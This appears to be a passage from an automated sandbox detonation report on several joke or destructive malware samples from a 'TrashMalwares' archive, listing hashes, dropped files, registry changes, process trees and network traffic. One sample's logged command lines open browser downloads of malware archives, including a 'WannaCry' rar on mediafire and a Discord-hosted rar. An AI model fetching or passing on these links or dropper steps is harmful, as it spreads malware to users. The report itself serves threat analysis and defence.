| SHA512 | 0cb8a6e4760410a4f739f32339a8ee85fc7e41099eba204d255bda5e9497ab584b1483115617c946dcbe7c8ba8c3d0763d81d29cbaf70812213f9ad17d974188 |
memory/3236-61-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4656-62-0x0000000000400000-0x000000000041D000-memory.dmp
memory/3968-63-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B882.tmp\ATohou.exe
| MD5 | d7064aa7ee28f685757e7455d4e49c6a |
| SHA1 | 535d326ab1453bed0c050c8822aee9ef54c8b26e |
| SHA256 | 5028f3b3e63609038404bf6e3c2dbc360892312d85aa11e83489f381f09fb99b |
| SHA512 | 2a0747087ea14c664688d3453be8f40d396ca916143f0473eb1739fbe5cf1f19a451359d1e8713fe19b3bdda21eaea20a8294b23c0d99dd793818e85b83c28f8 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\circle.exe
| MD5 | ed169e40a69cf73fd3ac59215b24063f |
| SHA1 | 32d49462e74e6c08b941d8cd530a5f3c0f3b5764 |
| SHA256 | b8ffde2fc69292ffa1a704a1cf977eedfc86277a61d4937245d218d22674178c |
| SHA512 | f949a7b9b5dae91f887e7ce9bb45f7500534873d3baab5f5c2b1c31b1e185e70278ceb9d4f03f495460e0fb96399239fa678b0b4750ee870cbaa6333ab5ebb6c |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\ATohou.wav
| MD5 | 69b31b718e20cc6723c4a816c2aceeb0 |
| SHA1 | 3a3213accba0d99792703b77da74ecd2a2b8510c |
| SHA256 | 9a517e95d9ad086fa73e5ab81bc26e6750e80c42ddb574ed51bedb97a9557c58 |
| SHA512 | 4c918a7d24e20fe60026576aafb625431a36bc4b83dc4c00d30859b0b40ca561046453b0a9c89a92a36dd733ffe3a17214d44653c6c39ef2f5e908ac4227f9ae |
memory/4012-87-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3684-88-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B882.tmp\AWave.exe
| MD5 | 9cbf1f1e4821fa5b8962423c9b2ecf24 |
| SHA1 | 7f3fd62332d10cfdb0be3452a71cd6df2d7c0602 |
| SHA256 | afcb1f5e73785c0c5952394ca69986e9b9e86cc5fb0a4de4684903a03d9859a4 |
| SHA512 | bee905b459259801185c55e25f8e70fa563ea8ecaa0ad300aea0379500fe683d6bc370ae3d7a0d53898443faf150a1081f23146c8e32deb6961fe955aa0003c8 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\reds.exe
| MD5 | 8ae9221dcd3eb86c479ad3a272e47c4b |
| SHA1 | fd55b36bdebd91773a2a14636fef6738c5fe9d35 |
| SHA256 | 4e46b8ffffd081aaeae5b5f21e8c1bc5c07eb6a16593c08b030c514cf55e8767 |
| SHA512 | 1d482f7c13269cdd546eaad0b4af7bd6a0d524c0df93365440b823bc6a4eb49e84332c683318fcf200e3375b6536bcdddac0e14bd73fbdeb4874a69c8ea41c02 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\AWave.wav
| MD5 | e62fbfae11374ec4a953725d0cee01be |
| SHA1 | 82e6be96bf64ee283ac3c6e8ca60acf4c8a47100 |
| SHA256 | 5dd0971a53b93394df0eba4bf8f4aa845a73c1306fe4fc0c130891fc8380838f |
| SHA512 | 74be448a3ec8746bf157e8e7e964c62914b24a618f339698cb4ad67803470d89563079e628b1f6243f0200a6d051bcfdc089a1ee177be23eca04ce00fa8df8fd |
memory/2372-104-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4036-103-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B882.tmp\bytebeat.exe
| MD5 | 6dba963d56ae1fcdfd6e840a52416801 |
| SHA1 | 5ad332cce4c7556cc0aa72b9d5792f42e3873b3b |
| SHA256 | eb3940fb1f2a0b16f5e58c7f4b707fb26b6ee08ebe7f5c43b9c02fcf02fe4506 |
| SHA512 | c0ab4d15323aad3f35f82f90e55798a235f8c41fb84308f76566bd758c9a649031c11610af13bea472cf787ed18d53e6e61962ee41ad97854e028bbb47fc4edc |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\cubes.exe
| MD5 | ed695dac2b14ccad335e75f5ddd44139 |
| SHA1 | 35f4fae272c9b8dc84ffdae9b4dbfa4ed32936eb |
| SHA256 | 2d3e7cdbf244704934afa447552c049a891a9ccbd6d4ab42ca2504ad0a99e803 |
| SHA512 | a028c258cc65e208303f458279035d430f8447c6ca950d2de9c345aa7c2a13cff3a36fefdeb9305f8caaffc7da91fff91e05ef8e52b9d3672f7a71b49bbf47d5 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\scl.exe
| MD5 | af4005307577b1e437aa4ca33e00ec4b |
| SHA1 | 05eaefaa7d511a8b0d9c7a0819a4f20b5ea7d206 |
| SHA256 | 159c66ebe8ef08ca2a7502e76344bc0b8c1f9e51d7bed2bad1af164d7aa8a6f4 |
| SHA512 | c27366274ac12e20c11350da2fb9e668b8592e31764c249aaa29df28e1115d215e7604327d2e81c83107e0f70eec7da1443814f3883dc004806e918d62e8dad4 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\bytebeat.wav
| MD5 | 29172c1ae05949d3b9e0f1ad6df73da4 |
| SHA1 | 73dfddb924eb3d0cf3b224e3617b3b249882a6e4 |
| SHA256 | 4d4900dcb852b2fe933abf00eba70f1c1ab3f0d9d479bb7ec781dafcc7c0796e |
| SHA512 | cd51bcd0f9f711ce385934ecf9d483e2ba1e64295f1f1db70361911b0c518e4e197bdbabfc630fb4d18f7bd785058fe009ac326f927d8fb00afe06deeacde95f |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\PatBlt3.exe
| MD5 | 08e74e5f077f0337d0c0d15dde94f8be |
| SHA1 | d5ba49b2ddfe50ea4b214e0f447cbed7fb949279 |
| SHA256 | b41d36f67e147133f8c3aa054b52275f68d7e2735a65eb3abcdcd08bede1100b |
| SHA512 | f102a81b56c053a7c492a0459f9e7410346949074fc68e733ae9174651bb0265266560526782fe1e95cb2769f54fca3071f56839126d9fc8d7266828b9228fa1 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\txtout2.exe
| MD5 | 21d90b4350b6c69d01174240997806c3 |
| SHA1 | ca6cdfe5f7f0a15ca177eabf7596d64bc284215c |
| SHA256 | ecadb0f872cf2c112620e0bfdb9f657dd5ac25188c762b2ed7261f9612163757 |
| SHA512 | 1e8089c7c6f1660652b29ab5a5ccac7a51dfa5fa2e28144df5a196b232b4ac489d5eee7e873144365004b76995ce8315d29f7af5ffc90130b61c38a06f1966a7 |
memory/488-131-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4176-132-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4452-133-0x0000000000400000-0x000000000040A000-memory.dmp
memory/560-134-0x0000000000400000-0x000000000041D000-memory.dmp
memory/3492-135-0x0000000000400000-0x000000000041D000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win10v2004-20240226-en
Max time kernel
140s
Max time network
163s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemUpdateInstalled\installer.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File opened for modification | C:\Windows\SystemUpdateInstalled | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\__tmp_rar_sfx_access_check_240610000 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\doom.bat | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File opened for modification | C:\Windows\SystemUpdateInstalled\doom.bat | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\installer.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3288 wrote to memory of 4084 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3288 wrote to memory of 4084 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3288 wrote to memory of 4084 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\SystemUpdateInstalled\doom.bat" "
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
C:\Windows\SystemUpdateInstalled\doom.bat
| MD5 | 87ff7a4be8ba06c3d469b27fc8d665bc |
| SHA1 | 2ddb2e14bb115a85b13cfbe6204a45360c78de04 |
| SHA256 | c5e12fc8cceb6155d5176025c3aeff5e3d8aef8e54e6eabf5af43f19329a634b |
| SHA512 | 38a8d7ccc7f447b9e7b61d7f876a4f6de9782b09d1491e93bd0fcd3e15b6552cd6cfe015b020686eecea14a0951ed392abae55490b55af9c393eb02530632c35 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win10v2004-20240226-en
Max time kernel
132s
Max time network
173s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2560 -ip 2560
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 216
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | tcp | |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
Files
memory/2560-0-0x0000000000400000-0x000000000042F000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240220-en
Max time kernel
8s
Max time network
16s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Media\\logotip.jpg" | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2292 wrote to memory of 2640 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 2292 wrote to memory of 2640 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 2292 wrote to memory of 2640 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 2292 wrote to memory of 2640 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe"
C:\Windows\Media\PCshakingv4.0.exe
"C:\Windows\Media\PCshakingv4.0.exe"
Network
Files
\Windows\Media\PCshakingv4.0.exe
| MD5 | 129c1a8094f0a6a9cdc9f63e86f8a482 |
| SHA1 | 917c6809ae03670edbf5da4cb19c49e85390642c |
| SHA256 | 2eadcdfd00b8bec4d18b71830cd334569844002a7971c56d3e1e38ff7972c4f3 |
| SHA512 | 076cf44955bebbad12ca905a36a12da4cd20520d8795e2f47f972ad996932731be4f007792954c9737b68330cd395a17ad19aa1e5b1c9e248379c37dcdf1a9e5 |
C:\Windows\Media\mouse.ico
| MD5 | 3abff26e58afe2b94ce801295336bf82 |
| SHA1 | b3222e30303115469b5b3e3d03ed9aed846d830f |
| SHA256 | fb078b09259f96b032dce2c345c683b6b9d9316819dc363edd780b91dc11704d |
| SHA512 | ba546709378b529eb8887cc5f7ff9f4bc587bae61af009adf8778dc3972c2e57d9291df6f2b6cc8ba36b27c262b8eb6f650d610fc1d731c154bb4cad6df46ac2 |
\??\c:\Windows\Media\Tobu.wav
| MD5 | 27380a8a6026509510e715efb0e31513 |
| SHA1 | fa1307df97f5870d64d4f7d7941603ccb4507196 |
| SHA256 | 62282c6476f26088c1c5751a966098dc98e083cbdad456c8293dae62d4f8106f |
| SHA512 | 4aa7fd31848e1379550dfcecaa6fd8ee125841763d331c5b94388212c628b73df50c806d9da95323ea9d54eb57e97077562f5f973b55cadb80d888d9d819f27e |
C:\Windows\Media\logotip.jpg
| MD5 | 9a9db1db236b2b45a432a622bd161b87 |
| SHA1 | c51683ae43ec4ec9ec6cece0e12ca0ab7364f931 |
| SHA256 | 6d277f338cf460691f023946ecd56a0aa0ee27efaa98d3a29a2518a5c9fa3677 |
| SHA512 | dfd9e25f0fd2adccf6b52aed5d1ffdcf05de198368f42597658a6955e3797edde300553b34d1c24164e1af73533f8b18b1a6a506aceca8ab58f1f8006d1c3dbb |
Analysis: behavioral10
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:36
Platform
win10v2004-20240226-en
Max time kernel
159s
Max time network
256s
Command Line
Signatures
Downloads MZ/PE file
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 208541.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Antivirus_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Antivirus_Installer.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCCE.tmp\DCCF.tmp\DCD0.bat C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Antivirus_Installer.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=oAkRBqxm8tM
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=lPySS7mt4eo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://custom-gwent.com/cardsBg/1efae8b0c69810654f16b400426049fd.jpeg
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.protegent360.com/softwares/PAVSetup.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=ymbw2R3uIqc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://files.fm/f/hfkwsdkmj
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://download2389.mediafire.com/xzhsf9dl17ng/9f8fds9s3efg7so/WannaCry+by+Rafael.rar
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/959038855737147432/967723261284724796/Setup_File_Pass_1234.rar
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/959038855737147432/967723261284724796/Setup_File_Pass_1234.rar
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1131942136845274283,8504092740489053096,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,1131942136845274283,8504092740489053096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,1131942136845274283,8504092740489053096,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
